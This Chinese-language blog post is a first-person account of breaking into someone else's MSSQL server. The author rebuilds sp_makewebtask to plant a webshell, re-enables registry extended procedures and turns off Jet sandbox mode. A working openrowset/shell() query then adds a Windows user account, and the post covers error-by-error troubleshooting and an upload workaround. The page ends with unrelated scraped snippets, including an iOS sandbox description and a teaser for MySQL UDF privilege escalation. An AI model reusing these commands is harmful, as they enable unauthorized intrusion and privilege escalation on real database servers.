今天剛好發現有乙個sa許可權。伺服器管理員將大部份擴充套件都刪除了。最後自己重建sp_makewebtask儲存才搞到乙個webshell了。(重建辦法,先找臺正常主機,sp_helptext sp_makewebtask,將他的sql語句重新拷到目標機器執行一次就行了)。
當然有了webshell,無法滿足我們貪婪的慾望。開始測試提權。有serv-u,但是提權失敗了。也許大家會說用back log來提權。但是那個太慢了,要重啟機器,會影響對方業務,同時又會給對方留下不好的印像。有人也許會說用讀取系統賬號的登錄檔,匯入匯出,轉殖賬號,這個辦法也可行,但由於並非黑對方主機,還是要保證對方系統的安整性比較好。(也許是心理因素,^_^)
最後只好試試沙盒模式。很多人sa直接用沙盒模式成功了好多機器,但我從來沒實踐過,也不太清楚成功率如何。只好拿他當回肉雞嘗試了。
由於擴充套件被刪除,先恢復對登錄檔的讀寫儲存。
dbcc addextendedproc (xp_regread,xpstar.dll)
dbcc addextendedproc (xp_regwrite,xpstar.dll)
修復沙盒的保護模式
exec master..xp_regwrite hkey_local_machine,softwaremicrosoftjet4.0engines,sandboxmode,reg_dword,0;--
檢視sandboxmode值是否已經變成0了。
exec master.dbo.xp_regread hkey_local_machine,softwaremicrosoftjet4.0engines, sandboxmode
最後呼叫沙盒模式
select * from openrowset(microsoft.jet.oledb.4.0,;database=c:windowssystem32iasdnary.mdb,select shell("cmd.exe /c net user user passwd /add"))
1.如果沙盒保護模式未「關閉」,會報錯:
伺服器: 訊息 7357,級別 16,狀態 2,行 1
未能處理物件 select shell("cmd.exe /c net user user passwd /add")。ole db 提供程式 microsoft.jet.oledb.4.0 指出該物件中沒有任何列。
ole db 錯誤跟蹤[non-inte***ce error: ole db provider unable to process object, since the object has no columnsprovidername=microsoft.jet.oledb.4.0, query=select shell("cmd.exe /c net user user passwd /add")]。
2.如果.mdb不存在或是輸入路徑錯誤
伺服器: 訊息 7399,級別 16,狀態 1,行 1
ole db 提供程式 microsoft.jet.oledb.4.0 報錯。
[ole/db provider returned message: 找不到檔案 c:windowssystem32iasdnary1.mdb。]
ole db 錯誤跟蹤[ole/db provider microsoft.jet.oledb.4.0 idbinitialize::initialize returned 0x80004005: ]。
3.如果輸入過程中多了一些空格,也會報錯。尤其要注意這點,很多人直接網上找文章複製貼上進去執行。
伺服器: 訊息 7357,級別 16,狀態 2,行 1
未能處理物件 select shell("cmd.exe /c net user user passwd /add")。ole db 提供程式 microsoft.jet.oledb.4.0 指出該物件中沒有任何列。
ole db 錯誤跟蹤[non-inte***ce error: ole db provider unable to process object, since the object has no columnsprovidername=microsoft.jet.oledb.4.0, query=select shell("cmd.exe /c net user user passwd /add")]。
4.如果mdb許可權和cmd.exe許可權不對,同樣會也出現問題。
當mdb許可權不對時,
伺服器: 訊息 7320,級別 16,狀態 2,行 1
未能對 ole db 提供程式 microsoft.jet.oledb.4.0 執行查詢。
[ole/db provider returned message: 未知]
ole db 錯誤跟蹤[ole/db provider microsoft.jet.oledb.4.0 icommandtext::execute returned 0x80040e14]。
5.如果net許可權不對時,卻沒有任何提示。
最終的提權辦法就是在當前的web目錄下面上傳系統的ias.mdb和cmd.exe,net.exe三個檔案。執行
select * from openrowset(microsoft.jet.oledb.4.0,;database=e:webias.mdb,select shell("e:webcmd.exe /c e:webnet.exe user user passwd /add"))
成功增加乙個計算機使用者。
MSSQL沙盒模式提權問題總結
恢復對登錄檔的讀寫儲存。dbcc addextendedproc xp regread,xpstar.dll dbcc addextendedproc xp regwrite,xpstar.dll 修復沙盒的保護模式 exec master.xp regwrite hkey local machin...
沙盒的介紹
l 應用程式包 上圖中的 layer 包含了所有的資源檔案和可執行檔案 ldocuments 儲存應用執行時生成的 需要持久化的資料 itunes 同步裝置時 會備份該目錄。例如,遊戲應用可將遊戲存檔儲存在該目錄l ltmp 儲存應用執行時所需的 臨時資料 使用完畢後再將相應的檔案從該目錄刪除。應用...
mysql 提權 通過Mysql提權的幾種姿勢
本文記錄利用mysql資料庫,在拿到shell之後進行提權的兩種方法。一 udf提權 基本步驟 1 匯出udf.dll檔案到指定目錄 有些webshell整合,直接導 出即可,沒有,則需要上傳 2 基於udf.dll建立自定義函式cmdshell 3 利用自定義函式,執行高許可權cmd命令 以下按照...